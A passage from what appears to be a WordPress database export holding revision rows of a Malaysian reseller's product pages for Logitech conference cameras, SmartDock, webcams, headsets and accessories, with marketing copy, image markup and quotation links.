687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-bcc950/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally-camera/\" role=\"button\">\n						View\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally-camera/\" role=\"button\">\n						View\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-autosave-v1','','','2019-03-05 17:22:51','2019-03-05 09:22:51','',16,'https://bintara.com.my/blog/2019/03/05/16-autosave-v1/',0,'revision','',0),(3042,1,'2019-03-05 17:23:03','2019-03-05 09:23:03','<h2>SMARTDOCK</h2><p>Secure meeting room console designed for Skype Room Systems</p><ul><li>Securely mount Surfaceâ„¢ Pro in any conference room</li><li>Start your Skype for Business meeting with one-touch join</li><li>Add connectivity without clutter</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>SMARTDOCK MAKES SKYPE ROOMS EASY</h2><p>Add video collaboration to any room with LogitechÂ® SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed WindowsÂ® 10 Skype meeting app.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/EqZbHTEVfvA<h3>PERFECT FOR SKYPE FOR BUSINESS</h3><p>Logitech SmartDock meeting room solution, designed for Microsoft SkypeÂ® for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.</p><h3>SECURELY LOCKS SURFACE PRO</h3><p>SmartDock is an AV control console and powered mount with KensingtonÂ® security slot for added protection. Confidently leave a SurfaceÂ® Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ADDS CONNECTIVITY WITHOUT CLUTTER</h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.</p><h3>SIMPLIFIES CONTENT SHARING</h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>COMPLETE THE EXPERIENCE</h3><p>All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM</h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.</p><h4>EXTENDED I/O FOR SURFACE PRO</h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.</p><h4>ENERGY-SAVING HIBERNATION</h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.</p><h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT</h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.</p><h4>SUPERIOR CABLE MANAGEMENT</h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.</p><h4>EASY ACCESS TO ROOM AV</h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the roomâ€™s camera, speakerphone, and display accessible to a userâ€™s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.</p>','Logitech SMARTDOCK','','inherit','closed','closed','','3031-autosave-v1','','','2019-03-05 17:23:04','2019-03-05 09:23:04','',3031,'https://bintara.com.my/blog/2019/03/05/3031-autosave-v1/',0,'revision','',0),(3043,1,'2019-03-05 17:30:11','2019-03-05 09:30:11','<h2>BCC950</h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p><ul><li>All-in-one design is easy to use and saves space</li><li>Plug-and-play convenience for Windows and Mac</li><li>Clear HD video and audio at an affordable price</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A GREAT VALUE FOR SMALL TEAMS</h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ALL-IN-ONE DESIGN</h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, itâ€™s everything you need to conduct a small video conference with up to 4 people in one room.</p><h3>PERFECT FOR PRODUCTIVE TEAMS</h3><p>With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EYE-TO-EYE</h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>NATURAL SOUND</h4><p>With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.</p><h4>HANDHELD REMOTE CONTROL</h4><p>Control BCC950â€™s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. Thereâ€™s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.</p><h4>QUALITY OPTICS</h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180Â° across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.</p><p>[maxbutton id=\"3\" ]</p>','Logitech BCC950','','inherit','closed','closed','','2972-revision-v1','','','2019-03-05 17:30:11','2019-03-05 09:30:11','',2972,'https://bintara.com.my/blog/2019/03/05/2972-revision-v1/',0,'revision','',0),(3044,1,'2019-03-05 17:31:21','2019-03-05 09:31:21','<h2>BCC950</h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p><ul><li>All-in-one design is easy to use and saves space</li><li>Plug-and-play convenience for Windows and Mac</li><li>Clear HD video and audio at an affordable price</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A GREAT VALUE FOR SMALL TEAMS</h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ALL-IN-ONE DESIGN</h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, itâ€™s everything you need to conduct a small video conference with up to 4 people in one room.</p><h3>PERFECT FOR PRODUCTIVE TEAMS</h3><p>With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EYE-TO-EYE</h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>NATURAL SOUND</h4><p>With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.</p><h4>HANDHELD REMOTE CONTROL</h4><p>Control BCC950â€™s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. Thereâ€™s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.</p><h4>QUALITY OPTICS</h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180Â° across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.</p><p>[maxbutton id=\"3\" ]</p>','Logitech BCC950','','inherit','closed','closed','','2972-autosave-v1','','','2019-03-05 17:31:21','2019-03-05 09:31:21','',2972,'https://bintara.com.my/blog/2019/03/05/2972-autosave-v1/',0,'revision','',0),(3045,1,'2019-03-05 17:31:37','2019-03-05 09:31:37','<h2>LOGITECH C925E</h2><p>Affordable 1080p HD webcam with integrated privacy shade</p><ul><li>Designed for desktop video conferencing</li><li>RightLightâ„¢ 2 ensures clear video with typical office lighting</li><li>Sliding internal shade assures privacy</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>LOGITECH C925E</h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>MORE PRODUCTIVE CALLS</h3><p>When you canâ€™t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.</p><h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLightâ„¢ 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>VERSATILE MOUNTING OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C925e on your own tripod instead.</p><h4>CONVENIENT 